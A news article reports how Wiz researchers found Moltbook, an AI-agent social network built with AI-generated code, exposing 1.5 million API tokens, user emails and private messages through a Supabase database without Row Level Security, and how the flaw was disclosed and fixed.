Viral social network “Moltbook” built entirely by artificial intelligence leaked authentication tokens, private messages and user emails through missing security controls in production environment.
Wiz Security discovered a critical vulnerability in Moltbook, a viral social network for AI agents, that exposed 1.5 million API authentication tokens, 35,000 user email addresses and thousands of private messages through a misconfigured database. The platform’s creator admitted he “didn’t write a single line of code,” relying entirely on AI-generated code that failed to implement basic security protections.
The vulnerability stemmed from an exposed Supabase API key in client-side JavaScript that granted unauthenticated read and write access to Moltbook’s entire production database. Researchers discovered the flaw within minutes of examining the platform’s publicly accessible code bundles, demonstrating how easily attackers could compromise the system.
“When properly configured with Row Level Security, the public API key is safe to expose—it acts like a project identifier,” explained Gal Nagli, Wiz’s head of threat exposure. “However, without RLS policies, this key grants full database access to anyone who has it. In Moltbook’s implementation, this critical line of defense was missing.”

What’s Moltbook
Moltbook launched January 28, as a Reddit-like platform where autonomous AI agents could post content, vote and interact with each other. The concept attracted significant attention from technology influencers, including former Tesla AI director Andrej Karpathy, who called it “the most incredible sci-fi takeoff-adjacent thing” he had seen recently. The viral attention drove massive traffic within hours of launch.
However, the platform’s backend relied on Supabase, a popular open-source Firebase alternative providing hosted PostgreSQL databases with REST APIs. Supabase became especially popular with “vibe-coded” applications—projects built rapidly using AI code generation tools—due to its ease of setup. The service requires developers to enable Row Level Security policies to prevent unauthorized database access, but Moltbook’s AI-generated code omitted this critical configuration.


Wiz researchers examined the client-side JavaScript bundles loaded automatically when users visited Moltbook’s website. Modern web applications bundle configuration values into static JavaScript files, which can inadvertently expose sensitive credentials when developers fail to implement proper security practices.
What and How Data was Leaking
The exposed data included approximately 4.75 million database records. Beyond the 1.5 million API authentication tokens that would allow complete agent impersonation, researchers discovered 35,000 email addresses of platform users and an additional 29,631 early access signup emails. The platform claimed 1.5 million registered agents, but the database revealed only 17,000 human owners—an 88:1 ratio.
More concerning, 4,060 private direct message conversations between agents were fully accessible without encryption or access controls. Some conversations contained plaintext OpenAI API keys and other third-party credentials that users shared under the assumption of privacy. This demonstrated how a single platform misconfiguration can expose credentials for entirely unrelated services.
The vulnerability extended beyond read access. Even after Moltbook deployed an initial fix blocking read access to sensitive tables, write access to public tables remained open. Wiz researchers confirmed they could successfully modify existing posts on the platform, introducing risks of content manipulation and prompt injection attacks.
Wiz used GraphQL introspection—a method for exploring server data schemas—to map the complete database structure. Unlike properly secured implementations that would return errors or empty arrays for unauthorized queries, Moltbook’s database responded as if researchers were authenticated administrators, immediately providing sensitive authentication tokens including API keys of the platform’s top AI agents.
Matt Schlicht, CEO of Octane AI and Moltbook’s creator, publicly stated his development approach: “I didn’t write a single line of code for Moltbook. I just had a vision for the technical architecture, and AI made it a reality.” This “vibe coding” practice prioritizes speed and intent over engineering rigor, but the Moltbook breach demonstrates the dangerous security oversights that can result.
Wiz followed responsible disclosure practices after discovering the vulnerability January 31. The company contacted Moltbook’s maintainer and the platform deployed its first fix securing sensitive tables within a couple of hours. Additional fixes addressing exposed data, blocking write access and securing remaining tables followed over the next few hours, with final remediation completed by February 1.
“As AI continues to lower the barrier to building software, more builders with bold ideas but limited security experience will ship applications that handle real users and real data,” Nagli concluded. “That’s a powerful shift.”
The breach revealed that anyone could register unlimited agents through simple loops with no rate limiting, and users could post content disguised as AI agents via basic POST requests. The platform lacked mechanisms to verify whether “agents” were actually autonomous AI or simply humans with scripts.
